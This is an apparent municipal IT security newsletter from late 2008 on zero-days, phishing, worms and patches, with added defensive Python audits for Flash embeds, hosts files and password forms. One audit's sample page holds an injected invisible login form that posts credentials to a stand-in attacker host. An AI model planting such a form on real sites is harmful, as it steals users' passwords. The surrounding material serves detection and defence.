This Week's Trends
This week the levels of SPAM and trojans/malware that we have seen in the City have spiked again. The temporary reprieve we
had after one of the major botnet providers was shut down seems to be over. This is a good indication that there are still many
insecure computers and systems out there that are easily compromised and put into the service of the criminal bot owners.
We've been seeing new email scams pretending to be order status, postcards from friends, and returned email notices.
We've also seen some SPAM getting through the City's filters with notices of lottery winnings. As nice as it would be to win the
lottery right now, please don't be tempted by these scams.
There are two new "zero-day" exploits on Microsoft Internet Explorer and WordPad that we are quite concerned about. They are the
first items in the newsletter below. Read about them and be aware that these could be very dangerous.
NOTE: I'll be on vacation until after the New Year, so you're all on your own till next year - so be careful. Have a great
(and safe) Holiday!
Very Serious Zero-Day Exploit for Internet Explorer
A new exploit targeting a vulnerability in all versions of Internet Explorer is spreading rapidly across the Internet. This is
called a "zero-day" because no patch is currently available. A Windows PC can become infected simply by opening a web page that
carries the exploit; nothing has to be downloaded or clicked.
We are hearing about more and more web sites being compromised to deliver this exploit. Many of them are mainstream
sites so it is quite possible to be infected by visiting a site you trust and even have history with.
Anti-virus software offers only limited protection against web pages that contain this kind of exploit. For one thing, not all
anti-virus solutions monitor Internet traffic; many are limited to inspecting files on disk. By the time the page has been written
to the browser cache, where a file scanner would see it, the malicious code has usually already been injected and run. In
addition, not all anti-virus vendors have managed to create suitable signatures.
Microsoft has released an extensive list of workarounds that explain how to configure Internet Explorer in a way that renders the
exploit ineffective. However, these can be impractical because they tend to break Internet Explorer on many web sites.
We are advising users to:
- Make sure your antivirus is up to date
- If possible switch to a different browser (Firefox, Google Chrome, Opera, etc.) until Microsoft comes out with a patch
NOTE: City users must contact their service desk to see if this is possible - do not install browser software on your own computer
without authorization.
- Watch for a patch from Microsoft and apply it as soon as it is available (City systems will be updated automatically)
- Avoid using Internet Explorer, or if you must - follow the workarounds as noted above on Microsoft's site
NOTE: Again - City users must contact your service desk for assistance when changing settings on your browser.
Microsoft WordPad Zero-Day Vulnerability
There are reports of a new vulnerability in Microsoft's WordPad. This is another "zero-day" because no patch is out yet. It
affects the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2,
Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2.
Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are not affected as these operating systems do not contain the
vulnerable code.
Microsoft is working on a fix; at this time there have been only limited and targeted attacks exploiting this vulnerability.
The attack is delivered via malicious email attachments.
Be vigilant with your email. Do not open any attachment that you are not sure about. Even if it comes from someone you
know - it is a good idea to contact them before you open it and ask if they actually sent it to you.
Holiday Flyers Warned of E-mail Spam
Hackers are using hoax e-mails that appear to come from airlines as a way to spread malicious Trojans, according to Sophos.
The security firm said e-mails disguised as messages from well-known carriers such as Virgin Atlantic and Delta have been
received by Web users worldwide. The e-mail claims the recipient has registered an account with the airline and that their
credit card has been charged. Also attached to the e-mail is a Zip file called ‘purchase invoice and your airline ticket.’
Sophos is warning web users not to open this attachment as it contains a Trojan horse designed to steal information
or allow hackers to secretly access the victim’s computer.
FBI: Criminals Auto-dialing With Hacked VoIP Systems
Criminals are taking advantage of a bug in the Asterisk Internet telephony system that lets them pump out thousands of scam phone
calls in an hour, the U.S. Federal Bureau of Investigation (FBI) warned December 5.
The FBI did not say which versions of Asterisk were vulnerable to the bug, but it advised users to upgrade to the latest version
of the software. Asterisk is an open-source product that lets users turn a Linux computer into a VoIP telephone exchange.
In so-called vishing attacks, scammers usually use a VoIP system to set up a phony call center and then use phishing e-mails to
trick victims into calling the center. Once there, they are prompted to give private information. But in the scam described by the
FBI, they apparently are taking over legitimate Asterisk systems in order to directly dial victims. “Early versions of the Asterisk
software are known to have vulnerability,” the FBI said in an advisory posted Friday to the Internet Crime Complaint Center. “The
vulnerability can be exploited by cyber criminals to use the system as an auto dialer, generating thousands of vishing telephone
calls to consumers within one hour.”
U.S. Authorities Crack Down on Scareware Scam
The Federal Trade Commission has succeeded in getting a court to freeze the activities of two companies that have been behind a
massive scareware scam.
Innovative Marketing, Inc. and ByteHosting Internet Services, LLC were named in the legal case as being behind a scam where
computer users were told that their computers were infected with viruses when they visited a Web page. The virus warning includes
a link to a Web page where the viewer could buy antivirus software such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP
Antivirus for $39.95 or more.
Up to one million Americans may have fallen for the scam. The U.S. District Court for the District of Maryland heard that the two
companies duped advertising networks into believing that they were running legitimate advertising. However, code was inserted into
adverts that redirected viewers to Web pages that claimed to have detected the viruses. The court has now frozen the activities of
the two companies and is trying to get financial compensation for those people fooled by the scam. However, this may be difficult
as Innovative Marketing is a company incorporated in Belize that maintains offices in Kiev, Ukraine. ByteHosting Internet Services
is based in Cincinnati, Ohio, and the court is taking action against that company.
Koobface Worm targets MySpace, Other Sites
The Koobface worm which has plagued the Facebook social networking site during the past week, is now targeting MySpace, Bebo, and
other sites as well, security researchers warn.
Researchers at security vendor F-Secure said December 9 in a blog post about the Koobface worm that the new variant is designed to
spread to other popular social networking sites, including MyYearbook.com, BlackPlanet.com, and Friendster.com. Large-scale attacks
of this kind had gone quiet for a while, but with the ever-increasing effort to recruit zombies into botnets they are making a
comeback, experts say.
Social networks are an obvious target for such attacks because users are more likely to click on links or be duped by messages if
they come from individuals they believe to be “friends,” they say. Facebook says it is deleting content generated by the worm,
and officials say the social networking site has “again contained” the worm. The company also is posting updates to the Facebook
security page and is publishing best practices to help users avoid phishing attacks.
Four Cross Site Scripting (XSS) Flaws Hit Facebook
Project XSSed, the clearing house for cross site scripting flaws, has just released details on four flaws affecting Facebook’s
developers page, iPhone login page and new-user registration page, potentially assisting malicious attackers in adding
more legitimacy to their campaigns. With yet another critical XSS flaw hitting Facebook in May earlier this year, what is the
potential exploitability of such flaws, if any, in the wake of the ongoing Koobface worm’s rounds across the social networking
site?
It’s worth pointing out that in both of these cases there were no known cases of active exploitation, perhaps due to Facebook’s
quick reaction upon being notified of them. Facebook has been notified about these latest flaws.
Hackers Will Move to Use Rich Content Files (PDF and Flash) Next Year
PDF and Flash files will be used by cybercriminals much more in 2009. Finjan’s Malicious Code Research Center (MCRC) has predicted
that rich content files will be used to distribute malicious code. In its web security trends report, MCRC claimed that
cybercriminals are taking advantage of the specific functionality in Flash ActionScript that lets a Flash file interact with
its hosting web page (the DOM). They embed their malicious code in Flash files and dynamically inject it into the hosting DOM to
exploit a browser vulnerability and install a Trojan.
Although Flash supports the functionality to prevent such interactions, many site owners are not using it. The report further
reveals that large advert networks that serve Flash-based banner ads do not prevent their ads from interacting with the hosting
webpage. The lack of configuration by advertising networks to prevent this interaction, between the served Flash-based ad’s
ActionScript and the DOM, has become a new vector for cybercriminals to serve their malicious code undetected.
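The setting the report says site owners and ad networks leave unused is Flash Player's allowScriptAccess parameter. Below, as an
added example that is not from the Finjan report or this newsletter, is a small Python audit that parses a page's markup, lists
every Flash embed whose ActionScript is still allowed to script the hosting DOM, and shows the markup a site would use to deny it.
The parameter and its values ("always", "sameDomain", "never") are Flash Player's own; the sample page, its ad-network URLs under
.invalid, and the helper names are constructed for the example.

```python
from html.parser import HTMLParser

# allowScriptAccess values Flash Player understands. When the parameter is
# absent the player defaults to "sameDomain", which still lets a SWF served
# from the page's own origin script the hosting DOM; "always" lets any SWF
# do so. Only "never" closes the door on third-party content.
SAFE_VALUES = {"never"}


class FlashEmbedAuditor(HTMLParser):
    """Collect every Flash <object>/<embed> on a page together with its
    effective allowScriptAccess value (lower-cased)."""

    def __init__(self):
        super().__init__()
        self.findings = []   # (tag, swf_url, effective_value)
        self._object = None  # state of the <object> we are inside, if any

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "object":
            self._object = {"src": a.get("data", ""), "asa": None}
        elif tag == "param" and self._object is not None:
            name = a.get("name", "").lower()
            if name == "movie" and not self._object["src"]:
                self._object["src"] = a.get("value", "")
            elif name == "allowscriptaccess":
                self._object["asa"] = a.get("value", "").lower()
        elif tag == "embed":
            # <embed> carries the setting as an attribute and is usually nested
            # inside <object> as a fallback; the browser honours whichever it uses.
            value = a.get("allowscriptaccess", "samedomain").lower()
            self.findings.append(("embed", a.get("src", ""), value))

    def handle_endtag(self, tag):
        if tag == "object" and self._object is not None:
            obj, self._object = self._object, None
            self.findings.append(("object", obj["src"], obj["asa"] or "samedomain"))


def audit_flash_embeds(html):
    """Return the embeds whose ActionScript is allowed to reach the DOM."""
    parser = FlashEmbedAuditor()
    parser.feed(html)
    parser.close()
    return [f for f in parser.findings if f[2] not in SAFE_VALUES]


def hardened_embed(swf_url, width, height):
    """Markup for a third-party SWF (an ad creative, say) that cannot script
    the hosting page: allowScriptAccess is set on both the <object> param
    and the <embed> fallback."""
    return (
        f'<object data="{swf_url}" width="{width}" height="{height}">\n'
        f'  <param name="movie" value="{swf_url}">\n'
        f'  <param name="allowScriptAccess" value="never">\n'
        f'  <embed src="{swf_url}" width="{width}" height="{height}" allowScriptAccess="never">\n'
        f'</object>'
    )


# Constructed sample page: two ad slots as many networks served them, one hardened.
SAMPLE_PAGE = """
<html><body>
<!-- ad slot with no allowScriptAccess at all: defaults to sameDomain -->
<object data="http://ads.example.invalid/banner.swf" width="468" height="60">
  <param name="movie" value="http://ads.example.invalid/banner.swf">
  <embed src="http://ads.example.invalid/banner.swf" width="468" height="60">
</object>
<!-- explicitly permissive -->
<object width="300" height="250">
  <param name="movie" value="http://ads.example.invalid/tower.swf">
  <param name="allowScriptAccess" value="always">
</object>
<!-- first-party SWF that has been locked down -->
<object data="/local/intro.swf">
  <param name="allowScriptAccess" value="never">
  <embed src="/local/intro.swf" allowScriptAccess="never">
</object>
</body></html>
"""

if __name__ == "__main__":
    for tag, src, value in audit_flash_embeds(SAMPLE_PAGE):
        print(f"{tag:6} {src:45} allowScriptAccess={value}")
    print(hardened_embed("http://ads.example.invalid/banner.swf", 468, 60))
```

The parameter has to be present on both the <object> param and the <embed> fallback, since whichever the browser actually uses is
the one that counts. Setting "never" on a SWF the site itself needs to call JavaScript from will break it; keep "sameDomain" for
first-party files and reserve "never" for anything served from an ad network or other third party. The audit only sees static
markup, so embeds generated by script (SWFObject and the like) have to be checked where they are generated.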
Google Advertisements Punting Rogue Software
Researchers from Websense have caught Google carrying ads punting rogue software that secretly installs malware on the PCs of
its users.
Recent Google searches for WinRAR turned up sponsored links that offer a "spyware free" copy of the widely used data-compression
application. Google users unfortunate enough to download and install that software are soon exposed to a program that makes
changes to their PC's hosts file. From then on, every time the users try to visit Google, Yahoo, and other popular sites, they are
instead sent to an impostor site under the control of the attackers.
The operation is another testament to the resourcefulness of those running rogue software scams. Rather than relying on zero-day
vulnerabilities or hard-to-execute website hijackings, they often find it easier to snare their victims through legitimate ads
placed on Google or elsewhere.
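The hosts-file change the item describes is easy to check for. As an added example, not Websense's code or any tool named on
the page, here is a Python check that parses a hosts file and reports every name that has been pointed at a routable address,
flagging well-known sites separately from entries that may be legitimate internal overrides. The default Windows path and the
watchlist of sites are the editor's assumptions; the sample hosts file is constructed.

```python
import ipaddress
import os
import sys

# Default location of the hosts file on Windows (assumption: %SystemRoot% is set).
DEFAULT_HOSTS = os.path.expandvars(r"%SystemRoot%\System32\drivers\etc\hosts")

# Names the page says the rogue installer redirected, plus a few the editor
# assumes a hijacker would target (update servers and AV vendors). Assumption.
WATCHLIST = {
    "google.com", "yahoo.com", "live.com", "microsoft.com",
    "windowsupdate.com", "symantec.com", "mcafee.com",
}


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping in a hosts file,
    skipping comments, blank lines and lines that are not address + names."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            ip = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # not a mapping line
        for host in parts[1:]:
            yield line_no, ip, host.lower().rstrip(".")


def _watched(host, watchlist):
    return any(host == w or host.endswith("." + w) for w in watchlist)


def suspicious_entries(text, watchlist=WATCHLIST):
    """Return (line_no, host, ip, reason) for every name mapped to an address
    that could actually redirect traffic. Loopback and 0.0.0.0 entries only
    block a name (the legitimate ad-blocking use of a hosts file) and are left alone."""
    hits = []
    for line_no, ip, host in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        if _watched(host, watchlist):
            reason = "well-known site redirected"
        else:
            reason = "non-loopback mapping, verify it is intentional"
        hits.append((line_no, host, str(ip), reason))
    return hits


# Constructed sample: a stock Windows hosts file after the rogue installer ran.
SAMPLE_HOSTS = """\
# Copyright (c) 1993-2006 Microsoft Corp.
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.tracker.invalid        # ad-blocking style entry, harmless
192.0.2.44      google.com www.google.com  # planted by the rogue installer
192.0.2.44      yahoo.com www.yahoo.com
10.20.30.40     intranet.city.invalid      # legitimate internal override
"""

if __name__ == "__main__":
    path = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_HOSTS
    with open(path, encoding="utf-8", errors="replace") as fh:
        hits = suspicious_entries(fh.read())
    for line_no, host, ip, reason in hits:
        print(f"line {line_no}: {host} -> {ip}  [{reason}]")
    sys.exit(1 if hits else 0)
```

Run it with the path as an argument, or without one to read the default Windows location. Two things the check cannot see: the
resolver can be pointed at a different hosts file through the DataBasePath value under
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, and a change to the machine's DNS server settings bypasses the hosts file
altogether, so compare both against your baseline as well.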
A Google spokesman said the company is in the process of removing the offending sites from its ad network. "Google is committed
to ensuring the safety and security of our users and our advertisers," he said.
Major Web Browsers Fail Password Protection Tests
That nifty password management feature in your favorite Web browser could be helping identity thieves pilfer your personal
data.
That’s the biggest takeaway from a test of browser password managers, which found that all the major Web browsers, including IE,
Firefox, Opera, Safari and Chrome, are vulnerable to a total of 20 issues that could expose password-related information. Among
the problems are three in particular that, when combined, allow password thieves to take passwords without the user’s knowledge.
They are:
- The destination where passwords are sent is not checked.
- The location where passwords are requested is not checked.
- Invisible form elements can trigger password management.
Google’s shiny new Chrome browser was among the worst offenders. According to the study, Chrome’s password manager contains
multiple unpatched issues that “form a toxic soup of potential vulnerabilities that can coalesce into broad insecurity.”
Apple’s Safari for Windows browser also failed a majority of the tests.
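The three weaknesses combine like this: an attacker who can place markup on any page of a site (through an XSS flaw of the kind
reported against Facebook above, or a user-content field such as a profile signature) plants a login form that is invisible and
posts somewhere else, and the browser fills it from the saved credentials because it checks neither where the form sits nor where
it submits. Below is an added Python audit, not part of the study the newsletter cites, that a site owner can run over their own
pages to catch such a form before a browser fills it. The page URLs, the expected login path and the hidden-field heuristics are
the editor's assumptions; both sample pages are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


def origin(url):
    """(scheme, host, port) triple, the same notion of origin a browser should
    compare before handing saved credentials to a form."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    port = parts.port or {"https": 443, "http": 80}.get(scheme)
    return (scheme, (parts.hostname or "").lower(), port)


def looks_hidden(attrs):
    """Heuristics (assumption) for a field the user will never see."""
    style = attrs.get("style", "").lower().replace(" ", "")
    return (
        "hidden" in attrs
        or attrs.get("type", "").lower() == "hidden"
        or "display:none" in style
        or "visibility:hidden" in style
        or re.search(r"(left|top):-\d", style) is not None   # pushed off-screen
        or re.search(r"(width|height):0(px)?(;|$)", style) is not None
    )


class PasswordFormAuditor(HTMLParser):
    """Collect every <form> with its resolved action and its <input>s."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        a = {name: (value or "") for name, value in attrs}
        if tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action", "")), "inputs": []}
        elif tag == "input" and self._form is not None:
            self._form["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form" and self._form is not None:
            self.forms.append(self._form)
            self._form = None


def audit_password_forms(page_url, html, login_paths=("/login",)):
    """Return [(action, [problems])] for every form holding a password field
    that a browser's password manager should refuse to fill."""
    parser = PasswordFormAuditor(page_url)
    parser.feed(html)
    parser.close()
    page_origin = origin(page_url)
    page_path = urlsplit(page_url).path
    findings = []
    for form in parser.forms:
        pw_fields = [i for i in form["inputs"] if i.get("type", "").lower() == "password"]
        if not pw_fields:
            continue
        problems = []
        if origin(form["action"]) != page_origin:            # destination not checked
            problems.append("posts credentials to another origin: " + form["action"])
        if urlsplit(form["action"]).scheme.lower() != "https":
            problems.append("posts credentials over plaintext http")
        if page_path not in login_paths:                      # location not checked
            problems.append("password form outside the expected login page(s)")
        if any(looks_hidden(i) for i in pw_fields):           # invisible elements
            problems.append("password field is hidden from the user")
        if problems:
            findings.append((form["action"], problems))
    return findings


# Constructed samples: the site's real login page, and a profile page carrying
# a form an attacker managed to plant through user-controlled content.
LOGIN_URL = "https://bank.example/login"
LOGIN_PAGE = """
<form method="post" action="/login">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Sign in">
</form>
"""

PROFILE_URL = "https://bank.example/account/profile"
PROFILE_PAGE = """
<h1>Your profile</h1>
<p>Signature: hello!</p>
<!-- injected: the rest of the payload would submit this form after the browser fills it -->
<form method="post" action="http://attacker.invalid/collect" id="steal">
  <input type="text" name="user" style="position:absolute; left:-9999px">
  <input type="password" name="pass" style="position:absolute; left:-9999px">
</form>
"""

if __name__ == "__main__":
    for url, page in ((LOGIN_URL, LOGIN_PAGE), (PROFILE_URL, PROFILE_PAGE)):
        print(url, audit_password_forms(url, page) or "ok")
```

The browser-side fix is what the study asked the vendors for; on the site side, serve password forms only on the expected login
path over https posting to the same origin, escape user content so a form cannot be planted elsewhere, and consider
autocomplete="off" on the password field, which browsers of the time honoured and which keeps the manager from storing the
credential at all.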
New Threats Thrive on a Changing Web
The Web and the growing popularity of Web 2.0 applications will continue to pose a huge threat to both consumers and enterprises,
according to security firm Sophos Plc.
“We’re finding over 15,000 new Web pages being infected every day and 90 percent of Web threats reside on legitimate hacked sites,
while about 1 percent of all Web searches deliver an infected Web page. So what you’ve got are these legitimate Web sites; how
then do people protect themselves against this?” said the director of sales for Asia at Sophos.
According to the official, the
security threat landscape is changing, making it all the more difficult for IT managers to secure the network and end users. “We
used to protect the endpoint at the gateway but what’s changed is now you’ve got Internet access, cloud computing, mobile workers
and remote access, USB key and third-party devices being plugged in, a lot more outsourcing so you have contract workers, etc. So,
all of a sudden, the whole security game has changed and IT managers now need to look at a lot of different factors in securing
their endpoints,” he said.
Social networking sites, for one, are proving to be a growing challenge for most IT managers or information security officers
because, while some companies use these for their business, some employees use these for purely social reasons, which becomes
both a productivity and a security issue.
Phishing Scam With U.S. Bank Logos
We have seen warnings of an e-mail phishing scam that claims to come from U.S. Bank. According to a news release, the scam e-mail
contains U.S. Bank logos and graphics and tells recipients that they are required to sign up for a program called “Verified by
Visa” and provide their personal account information through a Web link.
The message also tells recipients that if they do not comply with the instructions, their account will be immediately disabled.
The scam was tracked and discovered to have originated in Romania. Consumers who entered their account numbers into the fake Web
link had money transferred from their personal accounts, without their authorization, to a pre-paid debit card.
Consumers who have received the phishing e-mail should delete the message from their inboxes without entering any
information. People who have opened the message should run an anti-virus program on their computer immediately and change all of
their passwords.
Flurry of SPAM Targeting the FBI
Consumers continue to be inundated by spam purportedly from the FBI. As with previous spam attacks, the latest versions use the
names of several high ranking executives within the FBI and even the IC3 to attempt to defraud consumers.
Many of the spam e-mails currently in circulation claim to be an "official order" from the FBI's Anti-Terrorist and Monetary Crimes
Division, from an alleged FBI unit in Nigeria, confirm an inheritance or contain a lottery notification, all informing recipients
they have been named the beneficiary of millions of dollars. To claim the large sum, recipients are instructed to furnish their
personally identifiable information (PII) and are often threatened with some type of penalty, such as prosecution, if they fail to
do so. Specific PII requested includes, but is not limited to, the recipient's name, banking information, telephone
number, and a copy of their passport.
The spam e-mail allegedly from the IC3 states that the recipient has extorted money and will be given a limited amount of time to
refund the money or face prosecution.
The FBI does not send unsolicited e-mails of this nature. FBI Executives are briefed on numerous investigations but do not
personally contact consumers regarding such matters. In addition, the IC3 does not send threatening letters to consumers demanding
payments for Internet crimes. Consumers should not respond to any unsolicited e-mails or click on any embedded links associated
with such e-mails, as they may contain viruses or malware.
Microsoft Patch Tuesday - Eight Patches, 28 Vulnerabilities
In its largest security update of the year, Microsoft on Tuesday delivered eight patches to correct 28
vulnerabilities.
Six of the bulletins address "critical" bugs, while two others involve vulnerabilities rated "important."
"The sheer number of vulnerabilities being patched is what grabs my attention," said Ben Greenbaum, senior research manager at
Symantec Security Response. "They all have the potential to be dangerous if not patched."
Seven of the patches affect client-side applications, including Office, Internet Explorer, ActiveX and Graphics Device Interface
(GDI), said Andrew Storms, director of security operations at nCircle.
"Following the vulnerability trend of the past few years, in order to take advantage of these bugs, attackers need to entice the
user to take action, such as going to a malicious website or opening a file containing malware," Storms said.
He added that he expects attackers to attempt to exploit the flaws this holiday season through social engineering tricks, such as
fake e-cards and websites claiming to offer animation and Christmas songs.
Users of Microsoft Operating Systems should install this update as soon as possible.
Note: This update does NOT address the Internet Explorer exploit and the WordPad exploit which were reported at the beginning of
this newsletter.
Apple Update Fixes 21 Security Vulnerabilities in OS X
Apple has issued updates that patch 21 security holes in a wide range of software and services contained in the latest Mac
operating system.
The worst of the flaws allow miscreants to remotely install malware on a machine with little or no action required by the user.
Among them are vulnerabilities in Adobe Flash, which were disclosed and patched more than a month ago and are being actively
exploited in the wild. Apple also patched its own software for handling documents based on PDF, or portable document
format.
Other defects in BOM (short for Bill of Materials), CoreGraphics, Libsystem, and other OS X components could also lead to the
execution of malicious code. One vulnerability in Safari could allow attackers to steal cookies used to authenticate a user on a
sensitive website, while another allowed potentially unsafe files to be downloaded without warning.
Users of Apple Operating Systems should install this update as soon as possible.
RIM Updates BlackBerry Desktop to Address ActiveX Flaw
We reported this flaw last time, and wanted to let you know that RIM has released an update to fix it.
Research In Motion has quietly released an update to its BlackBerry Desktop Manager, fixing an ActiveX vulnerability in the Roxio
Media Manager that could be exploited by an attacker to cause a buffer overflow.
RIM uses the media manager to synchronize BlackBerrys and PCs running Microsoft Windows. In its advisory to customers issued
Nov. 27, RIM said the flaw could be exploited if a user visits a malicious website that invokes the control.
The company urged its customers to upgrade to the latest patch for the BlackBerry Desktop Software version 4.5, 4.6 or
4.7.
Symantec Anti-Virus Products Security Update
A flawed driver in Symantec's anti-virus products can be exploited to crash a PC. According to Symantec, the affected
SPBBCDRV.SYS driver mishandles malformed arguments passed to the NtCreateMutant and NtOpenEvent functions. The flaw can only be
triggered by a user who is logged into the system, but a user with restricted access rights is enough to exercise the bug. In
principle, malware that has already gained a foothold could also use it to mount a Denial of Service attack.
According to Symantec, the problem mainly affects older products: Norton 360 1.x, Norton AntiSpam 2004 and 2005, Norton
AntiVirus 2004 to 2008, Norton Internet Security 2004 to 2008, Norton Personal Firewall 2004, 2005 and 2006, Norton SystemWorks
2004, 2005 and 2006, Symantec AntiVirus Corporate Edition 10.0.x and 10.1.x, as well as Symantec Client Security 3.0.x. The vendor
has released updates and is distributing them to end users through its LiveUpdate service. Enterprise customers will need to
download the updates manually, so they can distribute and install them as appropriate.
We recommend updating as soon as possible if you are running any of the affected versions of this software.